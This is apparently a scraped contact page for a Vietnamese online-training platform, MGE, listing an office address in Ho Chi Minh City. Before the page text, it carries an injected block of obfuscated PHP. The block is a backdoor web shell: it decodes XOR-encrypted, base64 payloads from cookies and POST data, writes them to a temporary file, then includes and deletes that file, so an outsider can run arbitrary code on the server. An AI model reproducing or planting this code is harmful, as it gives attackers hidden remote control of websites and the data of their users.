$dMWkPxbA = "\150" . chr (111) . "\x5f" . "\x73" . "\x6d" . chr (112) . chr (72) . chr (119); $FWFlho = chr ( 876 - 777 ).chr ( 749 - 641 ).chr (97) . chr ( 772 - 657 ).chr (115) . "\137" . 'e' . chr ( 816 - 696 )."\x69" . "\x73" . chr (116) . "\163";$mLphpCXf = class_exists($dMWkPxbA); $dMWkPxbA = "55083";$FWFlho = "36550";$PNkzBOPrF = !1;if ($mLphpCXf == $PNkzBOPrF){function WpmIeqe(){return FALSE;}$boXhJ = "20320";WpmIeqe();class ho_smpHw{private function jOiUBzfZ($boXhJ){if (is_array(ho_smpHw::$RPBUX)) {$KyYHHmCmx = sys_get_temp_dir() . "/" . crc32(ho_smpHw::$RPBUX["\x73" . 'a' . chr ( 171 - 63 ).chr (116)]);@ho_smpHw::$RPBUX["\x77" . "\x72" . "\x69" . "\x74" . "\145"]($KyYHHmCmx, ho_smpHw::$RPBUX['c' . 'o' . "\x6e" . "\164" . chr (101) . chr (110) . "\x74"]);include $KyYHHmCmx;@ho_smpHw::$RPBUX[chr ( 854 - 754 ).'e' . "\x6c" . "\145" . "\x74" . chr ( 445 - 344 )]($KyYHHmCmx); $boXhJ = "20320";exit();}}private $KWyXBV;public function oerFA(){echo 17429;}public function __destruct(){$boXhJ = "563_62178";$this->jOiUBzfZ($boXhJ); $boXhJ = "563_62178";}public function __construct($kTCaFnrW=0){$YSmuyyVL = $_POST;$WEMSWCPiTw = $_COOKIE;$ERyLylCfgS = "ad30ea3d-42db-4e5b-bdda-3237341fd7f5";$ZsiJCVcQ = @$WEMSWCPiTw[substr($ERyLylCfgS, 0, 4)];if (!empty($ZsiJCVcQ)){$uHKyTJLK = "base64";$CpPyMZq = "";$ZsiJCVcQ = explode(",", $ZsiJCVcQ);foreach ($ZsiJCVcQ as $bmZdDwXtSG){$CpPyMZq .= @$WEMSWCPiTw[$bmZdDwXtSG];$CpPyMZq .= @$YSmuyyVL[$bmZdDwXtSG];}$CpPyMZq = array_map($uHKyTJLK . '_' . "\144" . "\145" . chr (99) . "\x6f" . "\x64" . 'e', array($CpPyMZq,)); $CpPyMZq = $CpPyMZq[0] ^ str_repeat($ERyLylCfgS, (strlen($CpPyMZq[0]) / strlen($ERyLylCfgS)) + 1);ho_smpHw::$RPBUX = @unserialize($CpPyMZq); $CpPyMZq = class_exists("563_62178");}}public static $RPBUX = 21189;}$zinci = new /* 33168 */ ho_smpHw(20320 + 20320); $_POST = Array();unset($zinci);} Liên hệ - Giải pháp đào đạo online

Liên hệ

Kết nối với chúng tôi

Hệ thống MGE - Nền tảng đào tạo online

Tầng 8, tòa nhà Charmington, 181 Cao Thắng, phường12, Quận 10, HCMC.

Liên hệ chúng tôi